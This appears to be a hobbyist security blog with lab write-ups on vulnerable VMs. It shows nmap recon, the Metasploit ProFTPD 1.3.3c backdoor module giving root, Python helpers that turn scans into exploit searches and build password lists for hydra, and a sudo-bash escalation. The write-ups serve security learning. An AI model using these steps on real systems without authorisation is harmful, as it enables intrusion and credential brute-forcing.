Basic Pentesting 1

In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.

First things first, let’s find it with nmap.

nmap 192.168.1.0/24 > nmap-network_results.

which (among other things) turned up the following VM, which was new to my network.

Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

Interestingly, it looks like its hostname is vtcsec (made a note of that…). Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap, this time with version and OS detection (the -O option needs root, so run it with sudo if you aren’t already).

nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt

Which produced the following results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

Ok, now we’ve got the versions of the services. Let’s see if there’s any low-hanging fruit here. I’ll check searchsploit for the FTP server.

searchsploit proftpd 1.3.3c

The output didn’t copy neatly to this blog format (I run URXVT, so it’s likely some Unicode that won’t translate to ASCII neatly… whatever). I did find two options available; the one that interests me was “Backdoor Command Execution (Metasploit)”. So let’s fire up Metasploit and see what we can do.
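Copying each version string out of the nmap report by hand is fine for three ports, but it gets tedious and error-prone on a bigger host. The following is an added example (not from the original post) that parses nmap’s normal-format output and builds one searchsploit query per open, fingerprinted service, trimming distro suffixes such as “Ubuntu 4ubuntu2.6” that would otherwise hide results because searchsploit matches exploit titles literally. The embedded report is constructed from the -sV scan above.

```python
"""Turn an `nmap -sV` report into searchsploit queries.

Added example, not code from the original post. Parses nmap's normal-format
output and emits one `searchsploit <product> <version>` command per open
service whose version nmap could fingerprint.
"""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the -sV output from the post, trimmed to the port table.
SAMPLE_REPORT = """\
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
"""

# One row of nmap's port table: "21/tcp open ftp ProFTPD 1.3.3c"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# A version-looking token: 1.3.3c, 7.2p2, 2.4.18 (but not "4ubuntu2.6")
VERSION_TOKEN = re.compile(r"^\d+(\.\d+)+[a-z0-9]*$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    service: str
    version: str  # raw nmap VERSION column, "" if nmap could not fingerprint it


def parse_report(text: str) -> List[Service]:
    """Extract the port-table rows from nmap normal output."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            found.append(Service(int(m["port"]), m["proto"], m["state"],
                                 m["service"], (m["version"] or "").strip()))
    return found


def search_term(svc: Service) -> Optional[str]:
    """Product name plus the first version token, e.g. 'OpenSSH 7.2p2'.

    Everything after the version (distro build tags, parenthesised notes)
    is dropped; searchsploit would otherwise AND those tokens into the query.
    """
    if svc.state != "open" or not svc.version:
        return None
    tokens = svc.version.split()
    idx = next((i for i, t in enumerate(tokens) if VERSION_TOKEN.match(t)), None)
    if idx is None:
        return None
    return " ".join(tokens[: idx + 1])


def searchsploit_commands(text: str) -> List[str]:
    """One shell-safe searchsploit command per searchable service."""
    cmds = []
    for svc in parse_report(text):
        term = search_term(svc)
        if term:
            cmds.append("searchsploit " + " ".join(shlex.quote(t) for t in term.split()))
    return cmds


if __name__ == "__main__":
    for cmd in searchsploit_commands(SAMPLE_REPORT):
        print(cmd)
```

searchsploit also has a built-in path for this (`searchsploit --nmap scan.xml` against `nmap -sV -oX scan.xml` output), which is the better choice when you have the XML; the script above is for the case where all you kept was the text report.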

msfconsole

Metasploit loads up

search ProFTPD

It runs and there it is: exploit/unix/ftp/proftpd_133c_backdoor. This should be easy enough then. One thing worth knowing before running it: the version banner alone doesn’t prove the box is vulnerable. The backdoor was planted in the 1.3.3c source tarballs served from the project’s own distribution server for a few days at the end of November 2010, so a clean 1.3.3c build won’t fall to this module; if it fails, the server may simply be an untainted build rather than a hardened one.

use exploit/unix/ftp/proftpd_133c_backdoor
set rhost 192.168.1.227
exploit

Voila. I got a shell. Let’s see who I am.

whoami

I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.


If you want to see some other vulnerable VM write-ups I’ve done, check out the vulnerable VM category.

Learning Feels Like Cheating

So on a couple of the vulnerable machines I’ve reached a point where I have no idea what to do next.  I’ve ended up pulling the walkthroughs and seeing how other people approach things.  While it makes sense to learn from others, and it absolutely has helped me learn multiple techniques way faster than I could have on my own, I can’t shake the feeling it’s cheating.  I suppose it’s my own bullshit. But if the goal is to learn how to do something, and I can accomplish that goal, and gain the useful knowledge in a fraction of the time (and still retain that information for later) it just makes sense.  I do hope to do enough of these that I can start getting root without cheat sheets. But for now, it’s still very much a learning experience for me, so I’ll keep on looking things up as needed.

All of that said, I’m already seeing a big difference. I know far more tools than I did a month ago. I can accomplish a good deal from memory/experience at this point.  I’m learning things. So if that’s the goal, then cheating be damned, I’m going to do it.

RickdiculouslyEasy

Luke (@LhHillz) put together a B2R called RickdiculouslyEasy.  How could I resist. Wubbalubbadubdub here we go! Will post updates as things progress.

UPDATE: Completed. Got all 130 points, took 2 1/2 hours. Learned tons of things. Even some things I probably should have already known from being a sysadmin. (How to use SCP from the command line!)

Learned about building password lists using crunch, and then using those lists to attack something with hydra.  All in all, time well spent. Onto the next one!
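The useful habit with crunch is to count before you generate: a pattern that looks modest can expand to millions of lines, and hydra over ssh will not get through that in a sitting. The following is an added example (not from the post, and not crunch itself) that reproduces the four placeholder classes crunch’s -t option documents (@ lowercase, , uppercase, % digit, ^ symbol) so a list can be sized, and only then written out for hydra. The symbol set is a reduced one chosen for this example.

```python
"""Pattern-based wordlist generation in the style of `crunch -t`.

Added example, not from the post and not crunch's own code. Placeholders follow
crunch's documented -t syntax; literal characters in the pattern pass through.
"""
import itertools
import string
from typing import Iterator

PLACEHOLDERS = {
    "@": string.ascii_lowercase,   # 26
    ",": string.ascii_uppercase,   # 26
    "%": string.digits,            # 10
    "^": "!@#$%^&*()-_+=",         # reduced symbol set, chosen for this example
}


def candidate_count(pattern: str) -> int:
    """Number of words the pattern expands to (literal characters contribute 1)."""
    n = 1
    for ch in pattern:
        n *= len(PLACEHOLDERS.get(ch, ch))
    return n


def expand(pattern: str) -> Iterator[str]:
    """Yield every word matching the pattern, in crunch's left-to-right order."""
    pools = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def write_wordlist(pattern: str, path: str, limit: int = 1_000_000) -> int:
    """Write the expansion to `path`, refusing patterns above `limit` candidates.

    The size check runs before any file is opened, so an oversized pattern
    fails fast instead of filling the disk.
    """
    total = candidate_count(pattern)
    if total > limit:
        raise ValueError(f"{pattern!r} expands to {total} candidates, above limit {limit}")
    with open(path, "w") as fh:
        for word in expand(pattern):
            fh.write(word + "\n")
    return total


if __name__ == "__main__":
    # A company-style guess: capital letter, four lowercase, two digits.
    for p in (",@@@@%%", "pass%%", "^@@@@@@@"):
        print(f"{p!r}: {candidate_count(p):,} candidates")
```

Once the count is sane, the file goes straight to hydra as the password list (`hydra -l <user> -P list.txt ssh://<target>`); the hostname and user are whatever the box gave you.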

LazySysadmin Done

Finished badstore, so it was time for something new.

So I downloaded and spun up LazySysAdmin.  A friend concurrently tried the same and showed me a couple of things. (SPARTA!!!) I learned about wpscan from some googling which turned up some nice info. Found an open share which had a password hidden in it.  Located the WordPress config file and got myself into a basic shell with the info I found there, then once in was able to get a root shell by launching BASH from sudo.  It’s listed as an easy Boot2Root, and it was fairly straightforward. Lots of fun though. Thanks to Togie McDogie (@TogieMcdogie)!

Onto the next one…